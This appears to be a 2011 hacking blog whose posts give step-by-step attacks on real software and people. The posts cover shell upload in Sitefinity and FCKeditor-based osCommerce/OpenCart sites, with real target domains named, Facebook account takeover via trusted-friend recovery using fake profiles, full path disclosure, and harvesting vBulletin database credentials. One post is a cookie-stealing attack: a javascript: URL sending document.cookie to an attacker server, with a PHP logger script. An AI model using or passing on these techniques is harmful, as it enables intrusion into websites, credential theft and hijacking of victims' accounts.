Hacking Pro

Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Posted in Wednesday, 27 July 2011

by Saadi

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserContr...torDialog.aspx

select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

Upload to # http://site.com/Images/[shell]

credit goes to blackhat team !!

"Powered By osCommerce" or "Powered By OpenCart" Vulnerability

Posted in Tuesday, 26 July 2011

by Saadi

0 comments

TUTORIAL

1. searching the target with a dork "Powered By osCommerce" or "Powered By OpenCart" in google, Bing, or whatever

2. specify the target.

3. After finding the target add the code Below:
"Admin / view / javascript / FCKeditor / editor / filemanager / connectors / test.html" behind the url / target (without the quotes)
Exs: http://www.springfieldxd.info/buy/index.php?route=product/product&product_id=57
Become were: http://www.springfieldxd.info/buy/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. After that you'll find files to upload,

5. For the connector, Replace Asp into PHP files:)

6. Well now live upload the files you ...!!! Example: upload sitelamu.html


And the result is http://www.target.com/file-kamu.html
Examples of targets that vuln:
http://utahflowers.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
and the result: http://utahflowers.net/r00t.html

If you are lucky, you can also do additions Shell Into Target

For the Dork, Use your imagination in the memperluar dork. "Powered By osCommerce" or "Powered By OpenCart" Vulnerability

HackThatForum [MyBB/vBulletin/IPB]

Posted in Monday, 18 July 2011

by Saadi

0 comments

[MyBB/vBulletin/IPB]

In this thread I will gather some of the exploits for forum softwares.

Hope you like it.

Hacking Facebook Passwords

Posted in Sunday, 17 July 2011

by Saadi

0 comments

Hacking Facebook Passwords

How to Hack Facebook Passwords by adding into friend list.

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

It isn’t entirely unusual that Facebook users receive friend requests from people they do not know. Often, those friend requests are blindly accepted in an effort to grow the friendship base. It seems that especially people with Facebook accounts that are primarily used for marketing purposes are more likely to accept friend requests from people they do not know than the typical Facebook user does.

Such accounts could be hacked easily, and there is no ingenious hacking talent required to do so: You simply need to walk through Facebook’s passwork recovery process with two other Facebook friends of a targeted account.

You can easily gain access to a your friends Facebook account through a collusion approach. You have to use Facebook’s password recovery feature, which is accessible through the “Forgot your password?” link on the Facebook login page.
Once identified the Friend, Facebook suggested to recover the password via the existing email address. However, you can bypass this hurdle by clicking the “No longer have access to these?” link. In that case, Facebook asks for a new email address. In the following step, Facebook presents the security question tied to the account. However, you can also to bypass the question by typing wrong answers three times in a row. After that, Facebook provides a rather surprising way to get your account back – via the support of three friends.

1. First, you select three friends “you trust”. These three friends then receive a code, which is required to change the account password.

2. Select yourself and immediately received a code from Facebook. With those three codes, you can easily change the password for the targeted account.

3. The problem clearly is that three friends you do not really know and cannot trust could potentially gain access to the victim Facebook account – through the standard password recovery feature.

4. To bypass problem mentioned in step 3 SOCIAL ENGINEERING. Create your own 2 more fake profiles and add the victim as a friend on facebook. Now get all the 3 codes and you are done. NOTE: The targeted account will be locked for 24 hours after this password change and the user’s old email address receives a notification of the password change as well as the names of the three friends who were given the codes. However, if these are friends with fake names, it doesn’t quite matter that you now know their names.

Now if a Facebook user could in fact be in a situation when a Facebook account is not checked within a 24-hour period, particularly since we enjoy to flaunt our activities through Facebook status messages. And if the account is checked frequently, the account depends on Facebook’s response time, which can easily stretch to a number of days.

Bottom line is You don’t expose yourself to people you don’t know.

IF YOU LIKE THIS ..DO COMMENTS AND SHARE IT

[FPD]Finding hidden directories ( Full path disclouser )

Posted in Friday, 15 July 2011

by Saadi

0 comments

Here's a small how-to on performing the FPD attack. I'll try making my answers as simple as possible, so don't get nervous about any unusual vocabulary or terms.

FPD, full path disclosure?
Yes.

What is an FPD?
An FPD(full path disclosure) is an attack that results in the slave page displaying an error.

What's so special about the error?
The error could give information that leads to a certain directory that isn't meant for you to see; For example, an administration panel.

How do I do a full path disclosure?
First you're going to try voiding the session ID. You can do this by downloading "Edit this Cookie", it is available for Firefox and Chrome. Then you open the cookie manager, find the PHPSESSID, change the value to nothing, and click "Submit Cookie Changes". Another way you could do this is by entering
jvoid(document.cookie="PHPSESSID="); into the address bar and hitting enter. Once you do either of those, refresh the page and check for an error from the site.

If that doesn't work, then you can try finding a location on the site that looks something like this:
http://www.x.com/x.php?app=x%01

The X's could be anything(such as the name of a page or the website). The "app" could be mostly anything, but you will usually see it being something like app, url, page, or action. If you see that, then you can attempt to add an empty array before the '=' sign. This is an empty array, []. So now the url would look like this:
http://www.x.com/x.php?app[]=x
Once you insert the empty array, go to the modified url.

Okay, I got an error... Now what?
The error probably looks something like this:
Warning: trim() expects parameter 1 to be string, array given in /home/x/public_html/y/z/sources/base/a.php on line 1645
The "/home/X/public_html/Y/Z/sources/base/A.php" is a full path. One of those might be an important directory. What you can try doing is removing things one by one, start by taking off A.php and trim it down to home; maybe there might be an interesting page somewhere. If it's in none of those, you can try checking through a directory that isn't listed with some from the original error. It will usually be anything that sounds like it's a real name. An example of those in the error would be home, X, Y, Z, and A.php. So you could try those on different directories like:
x.com/x
x.com/forums/x
x.com/forums/index.php/x/y
x.com/z/a.php
x.com/x/y/z

Go through these steps, and you might come across some interesting places on your target website.

Hacking vBulletin 3.8.6 !

Posted in

by Saadi

0 comments

Hii..today i'm gonna show you a huge vBulletin's Bug in version 3.8.6... I know it's old..but are others people that still don't know it !

Okk..let's Start..

1.Search in google with this dork !

Code:
Powered By vBulletin 3.8.6

2.Go To :

Code:
http://www.slave.com/path/install/vbulletin-language.xml

3.Using Ctrl+F (find option) search for :

Code:
database_ingo

There in that phrase you will find something interesting Like This :
:yeye:

Code:
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5">

Database Name: {$vbulletin->config['Database']['dbname']}<br />

Database Host: {$vbulletin->config['MasterServer']['servername']}<br />

Database Port: {$vbulletin->config['MasterServer']['port']}<br />

Database Username: {$vbulletin->config['MasterServer']['username']}<br />

Database Password: {$vbulletin->config['MasterServer']['password']}

</phrase>

And the information about these (Db Name , Db User, Db Pass , Host , Port) can be found in Faq.php

So let's go to FAQ [ http://www.slave.com/path/faq.php ]

And in the search box Type

Code:
database

and then click search ... !

You will get the results ! :thumbsup::pirate::yeye:

How to steal cookies

Posted in

by Saadi

0 comments

Steal Cookies (Easy)

You need:
- Your server
- PHP Script which save something to file eg:
http://myserver.com/steal_cookie.php?cookie=
( you must write your own steal script in php ) or i will post later

later you write to you friend go on facebook.com and after this go on this:

Code:
javascript:self.document.location="http://myserver.com/steal_cookie.php?cookie=" + document.cookie;

It works on 100% if slave is on website what you want ;) for example when you want hack someone facebook account slave must be on facebook and replae facebook.com with your link! It works like XSS but is not ;P
but you can easly make adfly link or something
and this: jself.document.location="http://myserver.com/steal_cookie.php?cookie=" + document.cookie;
later looks like this: adfly.com/dfdere : blablabla ,etc...

Sorry for my english .

I thnk it helps :D

EDIT:Steal cookies script:

PHP Code:
<?php

    $file=fopen("cookies_stealed.txt","w+");

    fwrite($file, $_GET[cookie]);

  fclose($file);

    echo "<script>self.document.location = "http://facebook.com/";</script>";

?>

Hacking Pro

Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

"Powered By osCommerce" or "Powered By OpenCart" Vulnerability

HackThatForum [MyBB/vBulletin/IPB]

Hacking Facebook Passwords

IF YOU LIKE THIS ..DO COMMENTS AND SHARE IT

[FPD]Finding hidden directories ( Full path disclouser )

Hacking vBulletin 3.8.6 !

How to steal cookies

Pages

About Me

Translator

Visitors

Your Infomation